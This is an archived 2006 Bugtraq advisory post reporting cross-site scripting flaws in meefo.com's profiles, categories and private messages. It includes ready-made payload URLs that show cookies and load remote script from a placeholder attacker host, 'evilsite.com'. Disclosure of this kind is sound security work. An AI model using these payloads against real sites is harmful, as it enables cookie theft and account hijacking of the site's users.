| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060610213805.30087.qmail@securityfocus.com> Date: 10 Jun 2006 21:38:05 -0000 From: luny@...fucktard.com To: bugtraq@...urityfocus.com Subject: Meefo.com - XSS with cookie include Meefo.com Homepage: http://meefo.com Effected files: reading profiles index.php input boxes onprofiles sending private msgs ------------------------------ Reading aprofile and with cookie include PoC: Since data isn't properlly filtered (backslashes are added to ' and "), a user can input malicious data, such as <script>alert(document.cookie)</script> and itwill popup with the users cookie. Incldued at the end of this article are screenshots of the cookie vuln. Screenshots meefo4 and meefo5.jpg show this. http://meefo.com/?do=rdprof&user_pp=username<script>alert(document.cookie)</script> When editing your profile, data isn't properally filtered in theinput boxes either, so <script>alert(document.cookie)</ script> works here too. Another XSS Vulnerability example: http://meefo.com/?do=rdprof&user_pp=<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT> Reading catagories XSS Vuln: http://meefo.com/index.php?cat=Poetry<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT> Sending PM's XSS Vuln: http://meefo.com/?messages=send&to=<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT> Screenshots of cookie include vulns & more: http://www.youfucktard.com/xsp/meefo1.jpg http://www.youfucktard.com/xsp/meefo2.jpg http://www.youfucktard.com/xsp/meefo3.jpg http://www.youfucktard.com/xsp/meefo4.jpg http://www.youfucktard.com/xsp/meefo5.jpg http://www.youfucktard.com/xsp/meefo6.jpg
Powered by blists - more mailing lists